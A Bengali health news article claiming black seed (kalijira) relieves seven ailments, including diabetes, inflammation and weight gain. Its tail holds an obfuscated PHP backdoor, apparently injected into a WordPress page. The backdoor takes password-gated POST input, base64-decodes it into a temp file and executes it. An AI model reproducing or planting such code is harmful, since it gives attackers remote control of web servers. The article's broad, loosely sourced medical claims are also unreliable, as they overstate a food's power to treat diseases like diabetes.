সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

একটি উপাদান দূর করবে সাত রোগ!

photo-1464774284স্বাস্থ্য ডেস্ক : শরীরকে সুস্থ ও রোগ প্রতিরোধক্ষম রাখতে স্বাস্থ্যকর খাবার খাওয়ার বিকল্প নেই। কিছু খাবার রয়েছে, যেগুলো অত্যন্ত উপকারী এবং শরীর ভালো রাখতে বেশ কার্যকর। তেমন একটি খাবার বা উপাদান হলো কালিজিরা।

কালিজিরার মধ্যে রয়েছে লৌহ, ফসফেট, ফসফরাস; রয়েছে কেরটিন। কালিজিরা শরীরের সাত ধরনের সমস্যা কমাতে ভালোভাবে সক্ষম।

জীবনধারাবিষয়ক ওয়েবসাইট বোল্ডস্কাইয়ের স্বাস্থ্য বিভাগে প্রকাশিত হয়েছে এ-সংক্রান্ত একটি প্রতিবেদন।

১. শরীর থেকে বিষাক্ত পদার্থ দূর করে

কালিজিরা অন্ত্র ও রক্ত থেকে বিষাক্ত পদার্থ দূর করতে কাজ করে। এতে শরীর পরিশোধিত হয় এবং স্বাস্থ্যের উন্নতি ঘটে।

২. ডায়াবেটিস

সম্প্রতি কিছু গবেষণায় বলা হয়, কালিজিরার মধ্যে ইনসুলিন নিয়ন্ত্রণের উপাদান রয়েছে। এতে ডায়াবেটিস নিয়ন্ত্রণে থাকে।

৩. প্রদাহ দূর করে

কালিজিরার মধ্যে রয়েছে প্রদাহরোধী উপাদান। এটি প্রদাহ ও পেশি ফোলা ভাব দূর করে। গাঁটে ব্যথা, পেশিতে ব্যথা কমায়। গলা ব্যথা কমাতেও এটি বেশ কার্যকর।

৪. ওজন কমাতে

গবেষণায় বলা হয়, কালিজিরা শরীরের বিপাকীয় ক্ষমতা বাড়ায়। বিপাকীয় হার বাড়লে মেদ দ্রুত ঝরে। এতে ওজন কমে।

৫. নাকের শুষ্কতা

কালিজিরা নাকের শুষ্কতা ও প্রদাহ রোধ করে। এটি নাকের শুষ্কতা রোধের জন্য এক ধরনের অ্যানজাইম তৈরি করতে সাহায্য করে। এতে নাক আর্দ্র থাকে।

৬. হজম ভালো হয়

কালিজিরা হজম ভালো করে। এতে বাউয়েল মুভমেন্ট ভালো হয়। এটি এসিডিটি প্রতিরোধেও কার্যকর।

৭. রোগ প্রতিরোধ ক্ষমতা বাড়ায়

কালিজিরা ব্যাকটেরিয়া ও মাইক্রোবেসের সঙ্গে লড়াই করে। এটি কোষকে ভালো রাখে। এতে রোগ প্রতিরোধ ক্ষমতা বাড়ে এবং স্বাস্থ্য ভালো থাকে।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}